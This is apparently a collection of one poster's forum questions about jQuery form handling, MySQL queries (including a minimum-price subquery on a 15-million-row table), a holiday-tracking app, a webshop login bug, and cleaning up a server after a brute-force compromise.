Joins are good but i'm trying to use separate selects, it is faster sometimes especially for big tables.

Mostly there is something wrong with the script.

Hi guys,

I'm trying to work on a form with jquery.

I have a table with 9 cells, 9 inputs and 9 delete links.
I want to delete de particular cell on which i've clicked delete, but cannot figure it out how.

I am able to delete the first element with value="1" but not the rest.

Hi guys,

I have a database with hundreds of persons and doing a live-search with ajax.

And I have this query.
The idea is that I do have the test line in the db but it has a status 0, but it is keep showing up in the results even if I do a search based on the status = 1.

What could be my problem in this simple query ?

I've search the forums but status is not an explicit word but only if I use it as a SHOW STATUS

I'm working on a holiday scheduling app and I was wondering that if a person wants his holiday for example 10 days.

How would it be possible that I could track the holiday for each month ?

January - 6 days
February - 5 days

In this case, January has 31 days, I would like to group the days into months, in January I should have 6 days and the remaining in February, is this possible from a query?

I'm facing a weird problem with our Trustico Certificate.

We have a webshop with customers that are logging in to make purchases of different products, all of this works nice untill the user changes his/her DATE on the Computer that he/she is using.

If the date is changed on logout, the client is logged back in automatically with a specific user.

Really cant find the problem behind this...

Yes, I've reloaded my backup .htaccess, that was the second thing after restoring my apache to it's initial settings and checking my firewall logs, it seems it was a human error with an easy password. There was used a brute force hacking ... maybe with ruby or something.

Well, all of my cron jobs have been overwritten and there had been some new apache PID's on my system, found it's shell sources and got rid of them, but this encoded text has something in the back, my problem is that after decoding it from base64 it gets some weird text, out of loggic at first point, but there has to be a logic to fully decode that text.

A quick problem that I'm facing with a return method.
I've created a page for a friend with a questionnaire and i am validating all the radio buttons, this works nicely.

When i want to verify the input fields of text type, it alerts me but the return false; it's not kicking in.... don't know why.

The above query is not working, I think that is because of prices.p, i'ts kinf of unknown and invalid use of group functions.

Hi everyone,

Trying to do a subquery to select the minimum price from table1, table what holds 15 million rows.
I think that my approach is not the most suitable way of doing this.

I want to select after oen_norm because oen_norm may have 1-10 rows per entry, but I need the smallest price for each oen_norm.

Could you please help on this one ?

I have indexes set up, but that doesnt seem to help for this particular query.

SELECT * FROM db.table1 as a 
WHERE a.quality IN (1,2,3)
AND a.price = (SELECT MIN(price) FROM db.table1 WHERE oen_norm = a.oen_norm)
